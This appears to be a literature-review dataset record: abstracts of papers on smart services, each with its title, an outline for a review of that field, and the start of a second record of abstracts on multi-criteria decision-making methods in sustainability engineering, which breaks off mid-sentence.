ubiquitous smart space paper_content: Scalable real-time monitoring is one of important requirements to supply smart services for customers, on time, in ubiquitous smart space. We propose a scalable real-time monitoring method to aggregate large amounts of data from various sensor devices distributed over different domain areas. The real-time monitoring scheme can process data from sensor devices within deadline and is scalable based on the number of sensor devices. The scalability of monitoring can be improved by employing a hierarchical monitoring agent for sensor devices while still satisfying the data deadlines. Simulation results show that our real-time monitoring scheme can improve the met deadline ratio up to 27% compared to the previous schemes. --- paper_title: IT’S NOT ABOUT HAVING IDEAS – IT’S ABOUT MAKING IDEAS HAPPEN! FOSTERING EXPLORATORY INNOVATION WITH THE INTRAPRENEUR ACCELERATOR paper_content: Organizations usually strive for innovation to achieve economic growth. Thereby, incremental innovation of e.g., existing products is often the most attractive way because it is plannable to a certain extent and often reveals short-term success. However, many markets change due to new competitive structures caused by the rise of digital services, which facilitates market entries of new companies. For an incumbent firm trying to cope with these competitors, exploitation of existing ideas and technologies (i.e., incremental innovation) is not enough. Although these firms usually pay minor attention to it, they need to additionally explore how to establish disruptive innovation that complements or even changes their traditional business model before competitors do. In this contribution, we present a novel structure to foster exploratory innovation within incumbent organizations by unleashing the innovative potential of intrapreneurs as peripheral innovators: the Intrapreneur Accelerator. We consider this novel structure a service system for supporting intrapreneurs to develop and implement extraordinary ideas and thus fostering exploratory innovation for the organization. Using a design science approach, we will further present our methodology and our preliminary results, since we have already conducted two of four design iterations. --- paper_title: Exploring Platform Adoption in the Smart Home Case paper_content: Smart home (SH) services promote the comfort, convenience, security, entertainment, healthcare, education and communication of people in their home environments. Despite radical enhancements envisioned to peoples’ lives, the SH market has remained a niche for more than three decades. Yet, recent fast-paced developments, including ubiquitous computing, miniaturization of microelectronic components and digitalization of societies, have spurred a new wave of interest in a field populated by various technology platforms battling for dominance. In this light, we explore the determinants for wide-spread adoption of SH platforms informed by 21 experts from 19 companies. Our qualitative content analysis identifies, classifies, ranks and describes 34 determinants and yields a theoretical model on SH platform adoption. As such, we provide a basis for further research on platform ecosystems and managerial implications on platform design and governance in the SH field. In particular, we highlight the technical and organizational openness and the legitimacy of sponsorship. --- paper_title: Adaptive blurring of sensor data to balance privacy and utility for ubiquitous services paper_content: Given the trend towards mobile computing, the next generation of ubiquitous "smart" services will have to continuously analyze surrounding sensor data. More than ever, such services will rely on data potentially related to personal activities to perform their tasks, e.g. to predict urban traffic or local weather conditions. However, revealing personal data inevitably entails privacy risks, especially when data is shared with high precision and frequency. For example, by analyzing the precise electric consumption data, it can be inferred if a person is currently at home, however this can empower new services such as a smart heating system. Access control (forbid or grant access) or anonymization techniques are not able to deal with such trade-off because whether they completely prohibit access to data or lose source traceability. Blurring techniques, by tuning data quality, offer a wide range of trade-offs between privacy and utility for services. However, the amount of ubiquitous services and their data quality requirements lead to an explosion of possible configurations of blurring algorithms. To manage this complexity, in this paper we propose a platform that automatically adapts (at runtime) blurring components between data owners and data consumers (services). The platform searches the optimal trade-off between service utility and privacy risks using multi-objective evolutionary algorithms to adapt the underlying communication platform. We evaluate our approach on a sensor network gateway and show its suitability in terms of i) effectiveness to find an appropriate solution, ii) efficiency and scalability. --- paper_title: Prototyping Smart City applications over large scale M2M testbed paper_content: Many cities around the globe are adopting the use of Information and Communication Technology (ICT) as part of a strategy to transform into Smart Cities. These will allow cities in the developing world to cope with the ever increasing demand for services such as an effective electricity supply, healthcare and water management. Machine-to-Machine (M2M) communication standards play a vital role in enabling the development of Smart Cities by supporting new innovative services. Although Smart City services offer an exciting future, many challenges still have to be addressed in order to allow for mainstream adoption. This work focuses on issues related to prototyping Smart City services that utilize standardised M2M middleware platforms. In addition, the use of an inter-continental testbed for Smart City applications as an enabler for innovative, automated and interactive services is presented. The services developed will use an architecture which is based on the Smart City framework developed as part of the Testbeds for Reliable Smart City Machine-to-Machine Communication (TRESCIMO) project. These services will also serve as means to validate the use of Smart services within an African City's context. In addition, the architecture is validated by taking into account various real world use cases for Smart City applications. --- paper_title: Checkpoints, hotspots and standalones: placing smart services over time and place paper_content: From the user's point of view Ubicomp and smart environments have been researched especially in the home setting. Nevertheless, papers discussing the relationship of situated interaction and context are few. Effect of context on interaction has been mostly investigated in the mobile setting. To work towards filling this gap, this paper presents a set of interaction profiles for digital services placed in an environment. The main focus of this paper is on deployment of interaction with various smart services in various indoor places. Motivation for this study stems from the need to understand interaction in and with the environment in order to better design smart environments. To this end we analyzed 30 hand-drawn maps of three different indoor spaces with user designed smart service placements and interactions. The results indicate how multi-level, structural, activity and attention data can be combined in interaction profiles. Interaction profiles found in this work are checkpoint, hotspot, standalone, remote and object, which each represent a unique combination of physical structure, service content and preferred interaction method. These profiles and cognitive map data can be used to support smart environment design. --- paper_title: Smart servitization within the context of industrial user–supplier relationships: contingencies according to a machine tool manufacturer paper_content: Advanced manufacturing technologies (AMT) have been hailed as enablers to make industrial products and operations smart. The present paper argues that AMT can not only form a lever for developing smart goods and smart production environments, but can likewise form a basis to offer smart services and to propose servitized earning or payment models to industrial users. We do so on the basis of a literature review, followed by a case-based analysis of the AMT and servitization challenges to which a machine tool manufacturer is exposed in its industrial market environment. Consequently, the present study identifies a set of contingencies c.q. catalyzers with regard to seizing AMT for smart servitization practices within industrial business-to-business contexts. These are: the ability to capture relevant data; to exploit such data adequately and convert them into actionable knowledge; and to build trust among users and producers of capital goods in order to come to effective data exchange. We finish by deriving implications for smart servitization in a manufacturing context, and by outlining case-based lessons on how AMT and servitization can further interactive design and manufacturing practices in an industrial producer-user setting. We contend that there may be a gap between the technological and organizational readiness of (many) machine tool companies for smart servitization, on the one hand, and what different publications on AMT and Industry 4.0 are trying to make out. We also find that besides the high-tech and big data components to smart servitization, companies with an ambition in this field should take into account minimum/right information principles, to actually get to deep learning, and to establish a culture of trust with business partners, and inside implicated organizations among departments to create an environment in which smart servitized user-supplier relationships can prosper. --- paper_title: Time-constrained services: a framework for using real-time web services in industrial automation paper_content: The use of web services in industrial automation, e.g. in fully automated production processes like car manufacturing, promises simplified interaction among the manufacturing devices due to standardized protocols and increased flexibility with respect to process implementation and reengineering. Moreover, the adoption of web services as a seamless communication backbone within the overall industrial enterprise has additional benefits, such as simplified interaction with suppliers and customers (i.e. horizontal integration) and avoidance of a break in the communication paradigm within the enterprise (i.e. vertical integration). The Time-Constrained Services (TiCS) framework is a development and execution environment that empowers automation engineers to develop, deploy, publish, compose, and invoke time-constrained web services. TiCS consists of four functional layers—tool support layer, real-time infrastructural layer, real-time service layer, and hardware layer—which contain several components to meet the demands of a web service based automation infrastructure. This article gives an overview of the TiCS framework. More precisely, the general design considerations and an architectural blueprint of the TiCS framework are presented. Subsequently, selected key components of the TiCS framework are discussed in detail: the SOAP4PLC engine for equipping programmable logic controllers with a web service interface, the SOAP4IPC engine for processing web services in real-time on industrial PCs, the WS-TemporalPolicy language for describing time constraints, and the TiCS Modeler for composing time-constrained web services into a time-constrained BPEL4WS workflow. --- paper_title: Using a common architecture in Australian e-Government: the case of smart service Queensland paper_content: In this paper, we present the findings of a case study which examines the use of enterprise architectures in the context of the development and implementation of an Electronic Government (e-Government) Services Delivery initiative by the Queensland State government of Australia. The paper employs strategic alignment theory to critically examine the progress of the initiative from the development of public policy and business case documents, through to the pilot program, and progressive implementation of an electronic government environment that includes a number of redesigned Internet gateways, integrated contact (call) centres, electronic kiosks, and web-enabled customer service counters. The case is also compared with similar e-Government initiatives and provides an interesting example of how governments can use the electronic domain to service a diverse range of clients in a large and wide spread community. --- paper_title: Framework design for distributed service robotic systems paper_content: Service robot is one of the most promising industries in the future. Modular framework for designing and implementing a distributed service robot system including robot and intelligent environment is proposed. Components as sensors and actuators of a robotic system are standardized in both hardware and software design, resulting in an abstraction of digital smart devices with certain functions. A unified software platform with a core of Service-Oriented Architecture (SOA) middleware is established for the system. It employs the Player toolkit to access smart devices via drivers and interfaces, and the Web Service technology is introduced for automatic collaboration of smart services according to their functions. An implementation of a home-care service robotic system is described with 2D/3D realistic simulation. Experimental results validate the flexibility and open performance of the proposed demo system. --- paper_title: A Smart Hospital Information System for Mental Disorders paper_content: This study aims to build a smart hospital information framework to deal with various medical information. First, a ubiquitous smart hospital information system model under WaaS (Wisdom as a Service) architecture is proposed. With this model, medical information can be organized into different levels. In this model, novel methods of organizing medical information (offline computing) and smart services delivering (online computing) are defined. The methods are used to supply medical knowledge recommendation services to patients according to their personalized condition and context. As a use case, a smart medical knowledge recommendation system, namely SKeWa, was built to reveal the usefulness of the model and the methods. --- paper_title: Applications of big data to smart cities paper_content: Many governments are considering adopting the smart city concept in their cities and implementing big data applications that support smart city components to reach the required level of sustainability and improve the living standards. Smart cities utilize multiple technologies to improve the performance of health, transportation, energy, education, and water services leading to higher levels of comfort of their citizens. This involves reducing costs and resource consumption in addition to more effectively and actively engaging with their citizens. One of the recent technologies that has a huge potential to enhance smart city services is big data analytics. As digitization has become an integral part of everyday life, data collection has resulted in the accumulation of huge amounts of data that can be used in various beneficial application domains. Effective analysis and utilization of big data is a key factor for success in many business and service domains, including the smart city domain. This paper reviews the applications of big data to support smart cities. It discusses and compares different definitions of the smart city and big data and explores the opportunities, challenges and benefits of incorporating big data applications for smart cities. In addition it attempts to identify the requirements that support the implementation of big data applications for smart city services. The review reveals that several opportunities are available for utilizing big data in smart cities; however, there are still many issues and challenges to be addressed to achieve better utilization of this technology. --- paper_title: Securing smart maintenance services: Hardware-security and TLS for MQTT paper_content: Increasing the efficiency of production and manufacturing processes is a key goal of initiatives like Industry 4.0. Within the context of the European research project ARROWHEAD, we enable and secure smart maintenance services. An overall goal is to proactively predict and optimize the Maintenance, Repair and Operations (MRO) processes carried out by a device maintainer, for industrial devices deployed at the customer. Therefore it is necessary to centrally acquire maintenance relevant equipment status data from remotely located devices over the Internet. Consequently, security and privacy issues arise from connecting devices to the Internet, and sending data from customer sites to the maintainer's back-end. In this paper we consider an exemplary automotive use case with an AVL Particle Counter (APC) as device. The APC transmits its status information by means of a fingerprint via the publish-subscribe protocol Message Queue Telemetry Transport (MQTT) to an MQTT Information Broker in the remotely located AVL back-end. In a threat analysis we focus on the MQTT routing information asset and identify two elementary security goals in regard to client authentication. Consequently we propose a system architecture incorporating a hardware security controller that processes the Transport Layer Security (TLS) client authentication step. We validate the feasibility of the concept by means of a prototype implementation. Experimental results indicate that no significant performance impact is imposed by the hardware security element. The security evaluation confirms the advanced security of our system, which we believe lays the foundation for security and privacy in future smart service infrastructures. --- paper_title: Health Smart Home Services incorporating a MAR-based Energy Consumption Awareness System paper_content: Health smart homes would enable people suffering from various diseases and handicaps to live an autonomous lifestyle in their own residences. The concept of the health smart home emphasizes ‘aging in place’, where residents enjoy a healthy independent life in their own homes as they become older. While energy saving is one of the crucial issues to be addressed in domestic buildings, there is little research into household energy consumption in health smart homes. This paper identifies each variable’s implications for health smart home services and highlights its application to energy consumption awareness. We also introduce Mobile Augmented Reality (MAR) to simulate energy consumption awareness in health smart homes. Firstly, the research proposes a framework for constructing health smart home services with a focus on the practicability of each variable from the perspective of supporting user experience in home settings. Rather than address each variable in isolation, we consider comprehensive issues in terms of service effectiveness in supporting a healthy life at home. Additionally, the innovative MAR application associated with energy use is presented as a new solution for household energy consumption awareness. The proposed application will be a basis for the perspectives of future research directions on health smart home services. --- paper_title: Conceptual framework for services creation/development environment in telecom domain paper_content: The telecom service providers (fixed and mobile) understand that they must bring in new smart services in order to attract new customers, retain existing ones and increase revenue. The challenges and goals for doing so are as follows: determining which services are needed; introducing more services in a faster manner and at lower costs; delivering innovative services in a way that allows existing users to migrate smoothly to new ones. These goals could not be achieved with traditional closed and proprietary network infrastructure, as the vendor lock-in involved in that infrastructure results in limited scope of services, and dependency on old business models. New services require a much greater degree of system flexibility, performance and scalability, as well as open standards. Next Generation Network (NGN) provide the means for enabling agile service creation capabilities that facilitate better user experiences by integrating both new and legacy services across any access. However, NGNs involve complex structures even for simple services as they consist of a large number of building blocks and necessitate hierarchical models with a lot of parallel subsystems. Thus, particular attention has to be paid to understanding and modelling the performance of these systems. The rationale of this paper lies in developing a design and engineering methodology (based on a mathematical foundation) that addresses the service creation aspects for those fields in which traditional approaches will not work for NGNs. --- paper_title: ESTADO — Enabling smart services for industrial equipment through a secured, transparent and ad-hoc data transmission online paper_content: The advent of initiatives like Industry 4.0 promises increased operational efficiency through smart services and interconnected devices. To enable smart maintenance services for today's and future industrial equipment, regular status information must be transmitted from device customers to maintenance service providers over the Internet. However, simply attaching an industrial device to the Internet often leads to a security and privacy nightmare. Transparency about when and what data is being transmitted is of crucial interest to a customer. During transport, data must be protected against modifications and disclosure. A maintainer requires trust in the data's origin and integrity. In this paper, we propose ESTADO, a system that enables smart services by providing the necessary connectivity from industrial equipment to service providers for device state tracking. Our system design focuses on the migration of current devices and the security aspect. Using a non-permanent NFC based connection, connectivity is only established ad-hoc on customer demand, and any data transmission is fully transparent to a customer. We study our design through a prototype implementation using an Infineon security controller and evaluate the security, usability and deployment aspects of our solution. --- paper_title: Design and implementation of the first aid assistance service based on Smart-M3 platform paper_content: Smart technologies may be successfully applied in healthcare for creation of an IoT-enabled proactive pre-hospital and first aid assistance mobile services. A variety of smart services for the m-Health scenarios may be constructed by interaction of multiple knowledge processors (software agents) running on devices of the IoT environment. Thus, IoT-enabled m-Health applications should provide connection with smart space. It is possible to build such kind of services with Smart-M3 platform. The ontology describes interaction rules and the high-level design of the service. The first aid assistance scenario was chosen as a basic one. According to this scenario, sympathetic people provide first aid to patients in case of emergency. The study is focused on the implementation of the first aid assistance service consists of knowledge processors running on Linux servers and Android mobile devices. Such service should be scalable with adding new modules, sensors or participants. The purpose is to evaluate a possibility of application of a smart spaces approach for implementation mobile first aid services. Besides, implementation issues of server and client sides are discussed. --- paper_title: Sustainability and competitiveness through digital product-service-systems paper_content: This paper introduces an innovative approach towards Digital Product-Service-Systems that need to be addressed in building a sustainable future. As such, it serves as a foundation for more in-depth studies. The research attempts to present a usable guideline for small and medium-sized companies in order to complement product service systems with digital services. By applying the guideline developed within the research activity, companies shall be able to increase the value of their PSS offering and therefore creating a sustainable competitive advantage for their business solutions. It also highlights the interdependence of sustainability issues and the emergence of Product-Service-Systems. --- paper_title: Strategies in Smart Service Systems Enabled Multi-sided Markets: Business Models for the Internet of Things paper_content: Internet of Things has the potential to disrupt industries through changing products, services, and business models just as the Internet did in the '90s. Machine-to-machine communication is at the core of Internet of Things. Machines that we interact with in everyday life will start interacting with each other, collect data, and even use advances in data technologies to make decisions for us. Organizations, in order to achieve the highest profit, should also redesign their business service models conscientiously around externalities across markets that link through platforms and be specific about which markets to serve. In this research, we aim to build business ownership strategies to further two-sided markets and platforms literature. Herein, we focus on a number of business service models that link four sides of a market, and compare the advantages and disadvantages of network externalities generated by Internet of Things in each model. --- paper_title: A Pricing Model for the Internet of Things Enabled Smart Service Systems paper_content: How can firms price their products and services, as their ecosystems get smarter? In order to answer this question, this paper provides a stylized model and its expansion to characterize industries that have become smarter and connected through the introduction of smart devices, a.k.a. the Internet of Things. First, we propose a basic model for a duopolistic multi-sided market with externality effects. Next, we expand this model to a case that considers cross-market network externalities. Our results reveal that, even if Internet of Things technologies facilitate complex multi-sided markets, there is a strategic pricing solution for firm profits. Moreover, a strategic firm can benefit from aforementioned cross-market externalities in terms of higher market share and equilibrium prices. This study not only contributes to the theories of pricing information goods, but also provides a guideline for practitioners who make pricing and other strategic decisions for the Internet of Things enabled goods and services. ---
Title: Focusing the customer through smart services: a literature review Section 1: Introduction Description 1: Provide a holistic overview of past research and opportunities for further research in the field of smart services using a systematic literature review approach. Section 2: Smart services and a smart service lifecycle Description 2: Define smart services and describe the phases of the smart service lifecycle as adapted from the Information Technology Infrastructure Library (ITIL) framework. Section 3: Research design Description 3: Explain the methodology for identifying and analyzing relevant literature, including the literature search strategy and analysis process. Section 4: Identifying relevant literature Description 4: Describe the systematic search process across various databases and the criteria for selecting relevant articles. Section 5: Analyzing the identified literature Description 5: Outline the steps involved in analyzing the literature, including formal exploration and thematic categorization of the identified articles. Section 6: Findings Description 6: Present the results of the formal and content analysis, categorize the literature based on lifecycle phases, and create a heat map to show research intensity. Section 7: Discussion of research gaps and further research topics Description 7: Summarize research intensity, identify unexplored areas, and propose five specific fields for further investigation in smart service research. Section 8: Limitations Description 8: Acknowledge the limitations of the literature search and analysis process, including the scope of databases and search terms used. Section 9: Conclusions Description 9: Provide a summary of the review, emphasize the importance of further research, and outline concrete ideas for advancing the understanding of smart services.
Application of MCDM Methods in Sustainability Engineering: A Literature Review 2008–2018
9
--- paper_title: A multicriteria model for the selection of the transport service provider: A single valued neutrosophic DEMATEL multicriteria model paper_content: The decision-making process requires, a priori, defining and considering certain factors, especially when it comes to complex areas such as transport management in companies. One of the most important items in the initial phase of the transport process that significantly influences its further flow is decision-making about the choice of the most favorable transport provider. In this paper a model for evaluating and selecting a transport service provider based on a single valued neutrosophic number (SVNN) is presented. The neutrosophic set concept represents a general platform that extends the concepts of classical sets, fuzzy sets, intuitionistic fuzzy sets, and an interval valued intuitionistic fuzzy sets. The application of the SVNN concept made a modification of the DEMATEL method (Decision-making Trial and Evaluation Laboratory Method) and proposed a model for ranking alternative solutions. The SVNN-DEMATEL model defines the mutual effects of the provider's evaluation criteria, while, in the second phase of the model, alternative providers are evaluated and ranked. The SVNN-DEMATEL model was tested on a hypothetical example of evaluation of five providers of transport services. --- paper_title: Sustainable and Renewable Energy: An Overview of the Application of Multiple Criteria Decision Making Techniques and Approaches paper_content: The main purpose of this paper is to present a systematic review of MCDM techniques and approaches in sustainable and renewable energy systems problems. This study reviewed a total of 54 papers published from 2003–2015 in more than 20 high-ranking journals, most related to sustainable and renewable energies, and which were extracted from the Web of Science database. In the category of application areas, papers were classified into two main groups: (1) sustainable energy and (2) renewable energy. Furthermore, in the classification of techniques and approaches, the papers were categorized into six groups: (1) AHP and F-AHP; (2) ANP and VIKOR; (3) TOPSIS and F-TOPSIS; (4) PROMETHEE; (5) integrated methods and (6) other methods. In addition, papers were reviewed based on the authors’ nationalities, the publication date, techniques and approaches, the name of journal and studies criteria. The results of this study indicated that, in 2015, scholars have published more papers than in other years. Furthermore, AHP/fuzzy AHP and integrated methods were ranked as the first rank, with 14 papers. Additionally, Journal of Renewable Energy is the first journal, with 16 publications, and this was the most significant journal in this study. Findings of this review paper confirm that MCDM techniques can assist stakeholders and decision makers in unravelling some of the uncertainties inherent in environmental decision making, and these techniques demonstrate a growing interest of previous scholars to apply these techniques for solving different stages of sustainable and renewable energy systems. --- paper_title: A novel integrated decision-making approach for the evaluation and selection of renewable energy technologies paper_content: The decision-making in energy sector involves finding a set of energy sources and conversion devices to meet the energy demands in an optimal way. Making an energy planning decision involves the balancing of diverse ecological, social, technical and economic aspects across space and time. Usually, technical and environmental aspects are represented in the form of multiple criteria and indicators that are often expressed as conflicting objectives. In order to attain higher efficiency in the implementation of renewable energy (RE) systems, the developers and investors have to deploy multi-criteria decision-making techniques. In this paper, a novel hybrid Decision Making Trial and Evaluation Laboratory and analytic network process (DEMATEL-ANP) model is proposed in order to stress the importance of the evaluation criteria when selecting alternative REs and the causal relationships between the criteria. Finally, complex proportional assessment and weighted aggregated sum product assessment methods are used to assess the performances of the REs with respect to different evaluating criteria. An illustrative example from Costs assessment of sustainable energy systems (CASES) project, financed by European Commission Framework 6 programme (EU FM 6) for EU member states is presented in order to demonstrate the application feasibility of the proposed model for the comparative assessment and ranking of RE technologies. Sensitivity analysis, result validation and critical outcomes are provided as well to offer guidelines for the policy makers in the selection of the best alternative RE with the maximum effectiveness. --- paper_title: Evaluating construction projects of hotels based on environmental sustainability with MCDM framework paper_content: Abstract Environmental issues have got incredible attention among daily life activities. Sustainability penetrated in all society practices specially construction industry due to its substantial impact on the environment. Monitoring and controlling architectural project contains a decision problem with multi-varieties analysis. This study aimed to evaluate construction projects of hotels regarding environmental sustainability. To this end, a hybrid Multiple Criteria Decision Making (MCDM) model is proposed. Step‐wise Weight Assessment Ratio Analysis (SWARA) and Complex proportional assessment (COPRAS) compose a unified framework. A private construction project is supposed as a case study. The project is based on establishing a five star hotel in Tehran, Iran. In this research SWARA produces criteria weights and COPRAS will rank decision alternatives. This study can be a strategic route for other similar researches in other fields. --- paper_title: An exploration of measures of social sustainability and their application to supply chain decisions paper_content: Abstract Sustainability recognizes the interdependence of ecological, social, and economic systems – the three pillars of sustainability. The definition of corporate social responsibility (CSR) often advocates ethical behavior with respect to these systems. As more corporations commit to sustainability and CSR policies, there is increasing pressure to consider social impacts throughout the supply chain. This paper reviews metrics, indicators, and frameworks of social impacts and initiatives relative to their ability to evaluate the social sustainability of supply chains. Then, the relationship between business decision-making and social sustainability is explored with attention initially focused on directly impacting national level measures. A general strategy for considering measures of social sustainability is proposed, and a variety of indicators of CSR are described. Several of these indicators are then employed in an example to demonstrate how they may be applied to supply chain decision-making. --- paper_title: A review of multi-criteria decision-making applications to solve energy management problems: Two decades from 1995 to 2015 paper_content: Energy management problems associated with rapid institutional, political, technical, ecological, social and economic development have been of critical concern to both national and local governments worldwide for many decades; thus, addressing such issues is a global priority. The main of objective of this study is to provide a review on the application and use of decision making approaches in regard to energy management problems. This paper selected and reviewed 196 published papers, from 1995 to 2015 in 72 important journals related to energy management, which chosen from the “Web of Science” database and in this regard, the systematic and meta-analysis method which called “PRISMA” has been proposed. All published papers were categorized into 13 different fields: environmental impact assessment, waste management, sustainability assessment, renewable energy, energy sustainability, land management, green management topics, water resources management, climate change, strategic environmental assessment, construction and environmental management and other energy management areas. Furthermore, papers were categorized based on the authors, publication year, nationality of authors, region, technique and application, number of criteria, research purpose, gap and contribution, solution and modeling, results and findings. Hybrid MCDM and fuzzy MCDM in the integrated methods were ranked as the first methods in use. The Journal of Renewable and Sustainable Energy Review was the important journal in this paper, with 32 published papers. Finally, environmental impact assessment was ranked as the first area that applied decision making approaches. Results of this study acknowledge that decision making approaches can help decision makers and stakeholders in solving some problems under uncertainties situations in environmental decision making and these approaches have seen increasing interest among previous researchers to use these approaches in various steps of environmental decision making process. --- paper_title: Principal sustainability components: empirical analysis of synergies between the three pillars of sustainability paper_content: Starting from the concept of three fundamental sustainability dimensions (environmental, social, and economic), this study investigated professional contributions to sustainability by means of principal component analysis (PCA). Graduates from the Environmental Sciences program (N = 542) at ETH Zurich described their best professional contributions to sustainable development. Next, they evaluated whether their best practice example contributed to achieving any of the five environmental, social, and economic objectives of the Swiss national sustainability strategy. These judgments served as the basis for a PCA aiming to identify principal sustainability components (PSCs) covering typical synergies between sustainability objectives within and transcending the three fundamental dimensions. Three PSCs capturing important synergies were identified. PSC 1 Product and Process Development reflects how ecological innovation and modernization can generate social and economic benefits and at the same time facilitate... --- paper_title: A NOVEL HYBRID METHOD FOR NON-TRADITIONAL MACHINING PROCESS SELECTION USING FACTOR RELATIONSHIP AND MULTI-ATTRIBUTIVE BORDER APPROXIMATION METHOD paper_content: Selection of the most appropriate non-traditional machining process (NTMP) for a definite machining requirement can be observed as a multi-criteria decision-making (MCDM) problem with conflicting criteria. This paper proposes a novel hybrid method encompassing factor relationship (FARE) and multi-attributive border approximation area comparison (MABAC) methods for selection and evaluation of NTMPs. The application of FARE method is pioneered in NTMP assessment domain to estimate criteria weights. It significantly condenses the problem of pairwise comparisons for estimating criteria weights in MCDM environment. In order to analyze and rank different NTMPs in accordance with their performance and technical properties, MABAC method is applied. Computational procedure of FARE-MABAC hybrid model is demonstrated while solving an NTMP selection problem for drilling cylindrical through holes on non-conductive ceramic materials. The results achieved by FARE-MABAC method exactly corroborate with those obtained by the past researchers which validate the usefulness of this method while solving complex NTMP selection problems. --- paper_title: SUSTAINABLE DECISION MAKING IN CIVIL ENGINEERING paper_content: The paper deals with the intergenerational aspects of decision making in regard to lifecycle benefit-based design and maintenance planning for civil engineering facilities. Firstly, the concept of the Life Quality Index as a measure for assessing the feasiblity of live saving activities as well as for including the societal cost consequences of fatalities into engineering decision making is introduced. Thereafter a general framework is outlined facilitating the quantification of sustainable decision making in an intergenerational perspective. Thereafter some basic results from renewal theory are provided and suggested as a framework for lifecycle benefit-based design and maintenance planning. The aspects of discounting in the context of sustainability are subsequently addressed including the problem of intergenerational discounting and overlapping generations. Finally, an example considering optimal design is given. --- paper_title: A comprehensive review of data envelopment analysis (DEA) approach in energy efficiency paper_content: The main aim of this review article is to review of DEA models in regarding to energy efficiency. This paper reviewed and summarized the different models of DEA that have been applied around the world to development of energy efficiency problems. Consequently, a review of 144 published scholarly papers appearing in 45 high-ranking journals between 2006 and 2015 have been obtained to achieve a comprehensive review of DEA application in energy efficiency. Accordingly, the selected articles have been categorized based on year of publication; author (s) nationalities, scope of study, time duration, application area, study purpose, results and outcomes. Results of this review paper indicated that DEA showed great promise to be a good evaluative tool for future analysis on energy efficiency issues, where the production function between the inputs and outputs was virtually absent or extremely difficult to acquire. --- paper_title: Evaluating the performance of suppliers based on using the R'AMATEL-MAIRCA method for green supply chain implementation in electronics industry paper_content: Abstract Green supply chain management (GSCM) practitioners striving to create a healthier environment should first identify the key criteria pertinent to the process of implementing the appropriate sustainable policies, particularly in the most rapidly growing electronics sector. Since the decision to adopt GSCM in electronics industry is associated with the use of a multi-dimensional approach involving a number of qualitative criteria, the paper examines GSCM based on fifteen criteria expressed in five dimensions and proposes a multi-criteria evaluation framework for selecting suitable green suppliers. In real life, the assessment of this decision is based on vague information or imprecise data of the expert's subjective judgements, including the feedback from the criteria and their interdependence. Thus to treat this uncertainty in multi-criteria decision making (MCDM) process, rough number (RN) is applied here using only the internal knowledge in the operative data available to the decision-makers. In this way objective imprecisions and uncertainties are used and there is no need to rely on models of assumptions. Instead of different external parameters in the application of RN, the structure of the given data is used. Therefore, the identified components are incorporated into a rough DEMATEL-ANP (R'AMATEL) method, combining the Decision Making Trial and Evaluation Laboratory Model (DEMATEL) and the Analytical Network Process (ANP) in a rough context. In group decision making, a rough number-based approach aggregates individual judgements and handles imprecision. The structure of the relationships between the criteria expressed in different dimensions is determined by using the rough DEMATEL (R'DAMETEL) method and building an influential network relation mapping, based on which the rough ANP (R'ANP) method is implemented to obtain the respective criteria weights. Then, the rough multi-attribute Ideal-Real Comparative Analysis (R'MAIRCA) is used to evaluate the environmental performance of suppliers for each evaluation criterion. Sensitivity analysis is performed to determine the impact of the weights of criteria and the influence of the decision maker's preferences on the final evaluation results. Applying the Spearman's rank correlation coefficient and other ranking methods, the stability of the alternative rankings based on the variation in the criteria weights is checked. The results obtained in the study show that the proposed method significantly increases the objectivity of supplier assessment in a subjective environment. --- paper_title: Multi-criteria decision making approaches for green supply chains: a review paper_content: Designing Green Supply Chains (GSCs) requires complex decision-support models that can deal with multiple dimensions of sustainability while taking into account specific characteristics of products and their supply chain. Multi-Criteria Decision Making (MCDM) approaches can be used to quantify trade-offs between economic, social, and environmental criteria i.e. to identify green production options. The aim of this paper is to review the use of MCDM approaches for designing efficient and effective GSCs. We develop a conceptual framework to find relevant publications and to categorise papers with respect to decision problems, indicators, and MCDM approaches. The analysis shows that (1) the use of MCDM approaches for designing GSCs is a rather new but emerging research field, (2) most of the publications focus on production and distribution problems, and there are only a few inventory models with environmental considerations, (3) the majority of papers assume all data to be deterministic, (4) little attention has been given to minimisation of waste, (5) numerous indicators are used to account for eco-efficiency, indicating the lack of standards. This study, therefore, identifies the need for more multi-criteria models for real-life GSCs, especially with inclusion of uncertainty in parameters that are associated with GSCs. --- paper_title: Envisioning sustainability three-dimensionally paper_content: Abstract Sustainability has arisen as an alternative to the dominant socio-economic paradigm (DSP). However, it is still a difficult concept for many to fully understand. To help to communicate it and make it more tangible visual representations have been used. Three of the most used, and critiqued, sustainability representations are: (1) a Venn diagram, i.e. three circles that inter-connect, where the resulting overlap that represents sustainability can be misleading; (2) three concentric circles, the inner circle representing economic aspects, the middle social aspects, and the outer environmental aspects; and (3) the Planning Hexagon, showing the relationships among economy, environment, the individual, group norms, technical skills, and legal and planning systems. Each has been useful in helping to engage the general public and raising sustainability awareness. However, they all suffer from being highly anthropocentric, compartmentalised, and lacking completeness and continuity. These drawbacks have reduced their acceptance and use by more advanced sustainability scholars, researchers and practitioners. This paper presents an innovative attempt to represent sustainability in three dimensions which show the complex and dynamic equilibria among economic, environmental and social aspects, and the short-, long- and longer-term perspectives. --- paper_title: A Review of Multi-Criteria Assessment of the Social Sustainability of Infrastructures paper_content: Abstract Nowadays multi-criteria methods enable non-monetary aspects to be incorporated into the assessment of infrastructure sustainability. Yet evaluation of the social aspects is still neglected and the multi-criteria assessment of these social aspects is still an emerging topic. Therefore, the aim of this article is to review the current state of multi-criteria infrastructure assessment studies that include social aspects. The review includes an analysis of the social criteria, participation and assessment methods. The results identify mobility and access, safety and local development among the most frequent criteria. The Analytic Hierarchy Process and Simple Additive Weighting methods are the most frequently used. Treatments of equity, uncertainty, learning and consideration of the context, however, are not properly analyzed yet. Anyway, the methods for implementing the evaluation must guarantee the social effect on the result, improvement of the representation of the social context and techniques to facilitate the evaluation in the absence of information. --- paper_title: Using fuzzy multiple criteria decision making approaches for evaluating energy saving technologies and solutions in five star hotels: A new hierarchical framework paper_content: The purpose of this study is to present a hierarchical framework for evaluating and ranking the important key energy-saving technologies and solutions in the 10 biggest Iranian hotels through integrating fuzzy set theory, as well as qualitative and quantitative approaches. The important key energy factors for the evaluation of energy saving technologies and solutions are gathered through a literature survey. This paper proposes a framework based on the fuzzy Delphi method, fuzzy multiple criteria decision-making, including fuzzy analytic hierarchy process and fuzzy techniques for order performance by similarity to ideal solution. In the fuzzy Delphi method step of the study, 17 key energy factors were selected from among a total of 40 energy factors and categorised into five groups. Fuzzy analytic hierarchy process was used for the ranking of 17 key energy factors, and fuzzy techniques for order performance by similarity to ideal solution employed for ranking of the 10 biggest Iranian hotels in different provinces. The results of this study revealed that the first rank of main groups was equipment efficiency (0.403), system efficiency (0.225) had the second rank, third rank was related to reduction of heating and 